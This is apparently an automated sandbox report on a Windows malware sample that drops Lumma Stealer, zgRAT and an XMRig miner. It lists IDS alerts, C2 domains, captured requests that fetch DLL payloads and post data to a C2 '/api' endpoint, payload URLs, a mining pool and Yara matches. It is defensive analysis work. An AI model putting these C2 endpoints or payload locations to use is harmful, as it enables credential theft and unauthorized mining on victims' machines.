Source: Network traffic	Suricata IDS: 2055880 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (eemmbryequo .shop in TLS SNI) : 192.168.2.6:49778 -> 104.21.39.11:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49778 -> 104.21.39.11:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49778 -> 104.21.39.11:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:49780 -> 104.21.39.11:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49780 -> 104.21.39.11:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: tendencctywop.shop
Source: Malware configuration extractor	URLs: reggwardssdqw.shop
Source: Malware configuration extractor	URLs: eemmbryequo.shop
Source: Malware configuration extractor	URLs: tryyudjasudqo.shop
Source: Malware configuration extractor	URLs: tesecuuweqo.shop
Source: Malware configuration extractor	URLs: licenseodqwmqn.shop
Source: Malware configuration extractor	URLs: keennylrwmqlw.shop
Source: Malware configuration extractor	URLs: relaxatinownio.shop

Connects to many ports of the same IP (likely port scanning)

Source: global traffic

TCP traffic: 45.11.229.96 ports 39001,0,1,56001,5,6

Uses ping.exe to check the status of other devices and networks

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 localhost

Source: global traffic

TCP traffic: 192.168.2.6:49712 -> 45.11.229.96:56001

Source: global traffic

HTTP traffic detected: GET /o3M.dll HTTP/1.1Host: 2x.siConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 95.179.241.203 95.179.241.203
Source: Joe Sandbox View	IP Address: 104.21.39.11 104.21.39.11

Source: Joe Sandbox View	ASN Name: AS-CHOOPAUS AS-CHOOPAUS
Source: Joe Sandbox View	ASN Name: ALPHAONE-ASUS ALPHAONE-ASUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2036289 - Severity 2 - ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro) : 192.168.2.6:64325 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2826930 - Severity 2 - ETPRO COINMINER XMR CoinMiner Usage : 192.168.2.6:49730 -> 95.179.241.203:80

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: eemmbryequo.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=8OAZftaQCOeZaqHZldxJS9UyMv1ElG9Ve5j6noyzCQY-1726705565-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 74Host: eemmbryequo.shop

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /o3M.dll HTTP/1.1Host: 2x.siConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: strompreis.ru
Source: global traffic	DNS traffic detected: DNS query: 2x.si
Source: global traffic	DNS traffic detected: DNS query: pool.hashvault.pro
Source: global traffic	DNS traffic detected: DNS query: eemmbryequo.shop

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: eemmbryequo.shop

Source: PT54FFSL7ET46RASB.exe, l6E.exe.4.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: PT54FFSL7ET46RASB.exe, l6E.exe.4.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: PT54FFSL7ET46RASB.exe, l6E.exe.4.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: PT54FFSL7ET46RASB.exe, l6E.exe.4.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: powershell.exe, 00000006.00000002.2398415947.00000185CA773000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micros
Source: PT54FFSL7ET46RASB.exe, l6E.exe.4.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: PT54FFSL7ET46RASB.exe, l6E.exe.4.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: PT54FFSL7ET46RASB.exe, l6E.exe.4.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: l6E.exe.4.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: PT54FFSL7ET46RASB.exe, l6E.exe.4.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0=
Source: HPd7I3vQri.exe, 00000004.00000002.4612439352.0000000000EFC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: HPd7I3vQri.exe, 00000004.00000002.4705514585.00000000055A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: powershell.exe, 00000006.00000002.2377005576.00000185C206C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: PT54FFSL7ET46RASB.exe, l6E.exe.4.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: PT54FFSL7ET46RASB.exe, l6E.exe.4.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: PT54FFSL7ET46RASB.exe, l6E.exe.4.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: PT54FFSL7ET46RASB.exe, l6E.exe.4.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: powershell.exe, 00000006.00000002.2276324576.00000185B222A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000006.00000002.2276324576.00000185B222A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: HPd7I3vQri.exe, 00000004.00000002.4623115948.0000000002A78000.00000004.00000800.00020000.00000000.sdmp, yTRfYxWiym.exe, 00000005.00000002.2194703677.000002EACF091000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2276324576.00000185B2001000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000009.00000002.4611134630.0000020880001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000006.00000002.2276324576.00000185B222A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000006.00000002.2276324576.00000185B222A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: PT54FFSL7ET46RASB.exe, l6E.exe.4.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: aspnet_compiler.exe, 00000009.00000002.4611134630.0000020880131000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://2x.si/o3M.dll;
Source: powershell.exe, 00000006.00000002.2276324576.00000185B2001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000006.00000002.2377005576.00000185C206C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000006.00000002.2377005576.00000185C206C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000006.00000002.2377005576.00000185C206C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: RegAsm.exe, 00000018.00000002.2787828639.0000000000F1D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://eemmbryequo.shop/
Source: RegAsm.exe, 00000018.00000002.2787828639.0000000000F1D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://eemmbryequo.shop/api
Source: aspnet_compiler.exe, 00000009.00000002.4611134630.0000020880131000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://files.catbox.moe/k541xr.dll
Source: aspnet_compiler.exe, 00000009.00000002.4611134630.0000020880131000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://files.catbox.moe/kwfxr7.dll
Source: powershell.exe, 00000006.00000002.2276324576.00000185B222A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: yTRfYxWiym.exe, 00000005.00000002.2198386287.000002EADF315000.00000004.00000800.00020000.00000000.sdmp, yTRfYxWiym.exe, 00000005.00000002.2198386287.000002EADF045000.00000004.00000800.00020000.00000000.sdmp, yTRfYxWiym.exe, 00000005.00000002.2194522749.000002EACECD0000.00000004.08000000.00040000.00000000.sdmp, Current.exe, 00000008.00000002.2265321541.0000010E10626000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000008.00000002.2265321541.0000010E10676000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000010.00000002.2765446003.000002D62D80E000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000010.00000002.2757993264.000002D61D324000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: yTRfYxWiym.exe, 00000005.00000002.2198386287.000002EADF315000.00000004.00000800.00020000.00000000.sdmp, yTRfYxWiym.exe, 00000005.00000002.2198386287.000002EADF045000.00000004.00000800.00020000.00000000.sdmp, yTRfYxWiym.exe, 00000005.00000002.2194522749.000002EACECD0000.00000004.08000000.00040000.00000000.sdmp, Current.exe, 00000008.00000002.2265321541.0000010E10626000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000008.00000002.2265321541.0000010E10676000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000010.00000002.2765446003.000002D62D80E000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000010.00000002.2757993264.000002D61D324000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000010.00000002.2765446003.000002D62D87C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: yTRfYxWiym.exe, 00000005.00000002.2198386287.000002EADF315000.00000004.00000800.00020000.00000000.sdmp, yTRfYxWiym.exe, 00000005.00000002.2198386287.000002EADF045000.00000004.00000800.00020000.00000000.sdmp, yTRfYxWiym.exe, 00000005.00000002.2194522749.000002EACECD0000.00000004.08000000.00040000.00000000.sdmp, Current.exe, 00000008.00000002.2265321541.0000010E10626000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000008.00000002.2265321541.0000010E10676000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000010.00000002.2765446003.000002D62D80E000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000010.00000002.2757993264.000002D61D324000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: HPd7I3vQri.exe, 00000004.00000002.4623115948.0000000002C47000.00000004.00000800.00020000.00000000.sdmp, HPd7I3vQri.exe, 00000004.00000002.4623115948.0000000002A78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/testdemo345/DemoThing/raw/main/WebDriver.dll
Source: HPd7I3vQri.exe, 00000004.00000002.4623115948.0000000002C47000.00000004.00000800.00020000.00000000.sdmp, HPd7I3vQri.exe, 00000004.00000002.4623115948.0000000002A78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/testdemo345/DemoThing/raw/main/chromedriver.exe
Source: HPd7I3vQri.exe, 00000004.00000002.4623115948.0000000002A78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/testdemo345/DemoThing/raw/main/msedgedriver.exe
Source: HPd7I3vQri.exe, 00000004.00000002.4623115948.0000000002C47000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/testdemo345/DemoThing/raw/main/msedgedriver.execABCDEFGHIJKLMNOPQRSTUVWXYZabcdefg
Source: powershell.exe, 00000006.00000002.2393761070.00000185CA497000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://go.microsoft.co
Source: powershell.exe, 00000006.00000002.2377005576.00000185C206C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: HPd7I3vQri.exe, 00000004.00000002.4623115948.0000000002C47000.00000004.00000800.00020000.00000000.sdmp, HPd7I3vQri.exe, 00000004.00000002.4623115948.0000000002A78000.00000004.00000800.00020000.00000000.sdmp, yTRfYxWiym.exe, 00000005.00000002.2198386287.000002EADF315000.00000004.00000800.00020000.00000000.sdmp, yTRfYxWiym.exe, 00000005.00000002.2198386287.000002EADF045000.00000004.00000800.00020000.00000000.sdmp, yTRfYxWiym.exe, 00000005.00000002.2194522749.000002EACECD0000.00000004.08000000.00040000.00000000.sdmp, Current.exe, 00000008.00000002.2265321541.0000010E10626000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000008.00000002.2265321541.0000010E10676000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000010.00000002.2765446003.000002D62D80E000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000010.00000002.2757993264.000002D61D324000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: HPd7I3vQri.exe, 00000004.00000002.4623115948.0000000002C47000.00000004.00000800.00020000.00000000.sdmp, HPd7I3vQri.exe, 00000004.00000002.4623115948.0000000002A78000.00000004.00000800.00020000.00000000.sdmp, yTRfYxWiym.exe, 00000005.00000002.2194703677.000002EACED41000.00000004.00000800.00020000.00000000.sdmp, yTRfYxWiym.exe, 00000005.00000002.2198386287.000002EADF315000.00000004.00000800.00020000.00000000.sdmp, yTRfYxWiym.exe, 00000005.00000002.2198386287.000002EADF045000.00000004.00000800.00020000.00000000.sdmp, yTRfYxWiym.exe, 00000005.00000002.2194522749.000002EACECD0000.00000004.08000000.00040000.00000000.sdmp, Current.exe, 00000008.00000002.2247370156.0000010E00001000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000008.00000002.2265321541.0000010E10626000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000008.00000002.2265321541.0000010E10676000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000009.00000002.4611134630.0000020880001000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000010.00000002.2765446003.000002D62D80E000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000010.00000002.2757993264.000002D61D261000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000010.00000002.2757993264.000002D61D324000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000010.00000002.2757993264.000002D61D386000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: yTRfYxWiym.exe, 00000005.00000002.2198386287.000002EADF315000.00000004.00000800.00020000.00000000.sdmp, yTRfYxWiym.exe, 00000005.00000002.2198386287.000002EADF045000.00000004.00000800.00020000.00000000.sdmp, yTRfYxWiym.exe, 00000005.00000002.2194522749.000002EACECD0000.00000004.08000000.00040000.00000000.sdmp, Current.exe, 00000008.00000002.2265321541.0000010E10626000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000008.00000002.2265321541.0000010E10676000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000010.00000002.2765446003.000002D62D80E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/2152978/23354
Source: HPd7I3vQri.exe, 00000004.00000002.4623115948.0000000002C47000.00000004.00000800.00020000.00000000.sdmp, HPd7I3vQri.exe, 00000004.00000002.4623115948.0000000002A78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/2152978/23354rCannot
Source: aspnet_compiler.exe, 00000009.00000002.4690508162.00000208919A3000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000009.00000002.4690508162.000002089147A000.00000004.00000800.00020000.00000000.sdmp, AddInProcess.exe, 0000000E.00000002.2354734998.0000000140465000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://xmrig.com/benchmark/%s
Source: aspnet_compiler.exe, 00000009.00000002.4690508162.00000208919A3000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000009.00000002.4690508162.000002089147A000.00000004.00000800.00020000.00000000.sdmp, AddInProcess.exe, 0000000E.00000002.2354734998.0000000140465000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://xmrig.com/docs/algorithms
Source: aspnet_compiler.exe, 00000009.00000002.4690508162.00000208919A3000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000009.00000002.4690508162.000002089147A000.00000004.00000800.00020000.00000000.sdmp, AddInProcess.exe, 0000000E.00000002.2354734998.0000000140465000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://xmrig.com/wizard
Source: aspnet_compiler.exe, 00000009.00000002.4690508162.00000208919A3000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000009.00000002.4690508162.000002089147A000.00000004.00000800.00020000.00000000.sdmp, AddInProcess.exe, 0000000E.00000002.2354734998.0000000140465000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://xmrig.com/wizard%s

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778

Source: unknown	HTTPS traffic detected: 172.67.143.156:443 -> 192.168.2.6:49716 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.39.11:443 -> 192.168.2.6:49778 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.39.11:443 -> 192.168.2.6:49780 version: TLS 1.2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 24_2_00432D80 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

24_2_00432D80

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 24_2_00432D80 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

24_2_00432D80

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 24_2_00432EF0 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,

24_2_00432EF0

System Summary

Malicious sample detected (through community Yara rule)

Source: 4.2.HPd7I3vQri.exe.65f0000.3.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 4.2.HPd7I3vQri.exe.65f0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 14.2.AddInProcess.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 14.2.AddInProcess.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 14.2.AddInProcess.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: Detects coinmining malware Author: ditekSHen
Source: 9.2.aspnet_compiler.exe.2089153ee30.2.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 9.2.aspnet_compiler.exe.2089153ee30.2.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 9.2.aspnet_compiler.exe.2089153ee30.2.unpack, type: UNPACKEDPE	Matched rule: Detects coinmining malware Author: ditekSHen
Source: 9.2.aspnet_compiler.exe.208910155f8.0.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 9.2.aspnet_compiler.exe.208910155f8.0.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 9.2.aspnet_compiler.exe.208910155f8.0.unpack, type: UNPACKEDPE	Matched rule: Detects coinmining malware Author: ditekSHen
Source: 00000009.00000002.4690508162.00000208919A3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000004.00000002.4729715116.00000000065F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects zgRAT Author: ditekSHen
Source: 0000000E.00000002.2354734998.0000000140465000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000009.00000002.4690508162.000002089147A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: Process Memory Space: aspnet_compiler.exe PID: 3512, type: MEMORYSTR	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: Process Memory Space: AddInProcess.exe PID: 6116, type: MEMORYSTR	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown

.NET source code contains very large array initializations

Source: PT54FFSL7ET46RASB.exe, MoveAngles.cs	Large array initialization: MoveAngles: array initializer size 1299456
Source: HPd7I3vQri.exe.3.dr, InfoBaseConnector.cs	Large array initialization: CheckEvent: array initializer size 294576
Source: 3.2.RegAsm.exe.4e8260.2.raw.unpack, InfoBaseConnector.cs	Large array initialization: CheckEvent: array initializer size 294576
Source: 3.2.RegAsm.exe.436060.0.raw.unpack, WrapperVisitorProperty.cs	Large array initialization: QueryField: array initializer size 671584

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe

Code function: 8_2_00007FFD348F3D8D NtUnmapViewOfSection,

8_2_00007FFD348F3D8D

Source: C:\Users\user\Desktop\PT54FFSL7ET46RASB.exe	Code function: 0_2_009E0B8F	0_2_009E0B8F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00402320	3_2_00402320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004050C0	3_2_004050C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00420470	3_2_00420470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040FCF0	3_2_0040FCF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00419D19	3_2_00419D19
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041951B	3_2_0041951B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00415635	3_2_00415635
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041DEC3	3_2_0041DEC3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00404F00	3_2_00404F00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040CF8F	3_2_0040CF8F
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Code function: 4_2_00C951D0	4_2_00C951D0
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Code function: 4_2_00C9E1E0	4_2_00C9E1E0
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Code function: 4_2_00C9D5C8	4_2_00C9D5C8
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Code function: 4_2_00C95530	4_2_00C95530
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Code function: 4_2_00C920D6	4_2_00C920D6
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Code function: 4_2_00C920EA	4_2_00C920EA
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Code function: 4_2_00C92080	4_2_00C92080
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Code function: 4_2_00C9B1C0	4_2_00C9B1C0
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Code function: 4_2_00C949F8	4_2_00C949F8
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Code function: 4_2_00C95188	4_2_00C95188
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Code function: 4_2_00C951BF	4_2_00C951BF
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Code function: 4_2_00C92146	4_2_00C92146
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Code function: 4_2_00C92165	4_2_00C92165
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Code function: 4_2_00C9217F	4_2_00C9217F
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Code function: 4_2_00C9D910	4_2_00C9D910
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Code function: 4_2_00C9212F	4_2_00C9212F
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Code function: 4_2_00C91AA6	4_2_00C91AA6
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Code function: 4_2_00C91AB8	4_2_00C91AB8
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Code function: 4_2_00C943DC	4_2_00C943DC
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Code function: 4_2_00C95520	4_2_00C95520
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Code function: 4_2_05028D18	4_2_05028D18
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Code function: 4_2_05029202	4_2_05029202
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Code function: 4_2_0502DF88	4_2_0502DF88
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Code function: 4_2_0502AFD0	4_2_0502AFD0
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Code function: 4_2_05560040	4_2_05560040
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Code function: 4_2_05569070	4_2_05569070
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Code function: 4_2_05565600	4_2_05565600
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Code function: 4_2_05560006	4_2_05560006
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Code function: 4_2_05571750	4_2_05571750
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Code function: 4_2_0557F772	4_2_0557F772
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Code function: 4_2_05575518	4_2_05575518
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Code function: 4_2_05575528	4_2_05575528
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Code function: 4_2_05571742	4_2_05571742
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Code function: 4_2_0557F77B	4_2_0557F77B
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Code function: 4_2_0557CE32	4_2_0557CE32
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Code function: 4_2_055731F9	4_2_055731F9
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Code function: 4_2_0557F836	4_2_0557F836
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Code function: 4_2_05577268	4_2_05577268
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Code function: 4_2_0557F205	4_2_0557F205
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Code function: 4_2_0557F20E	4_2_0557F20E
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Code function: 4_2_05573208	4_2_05573208
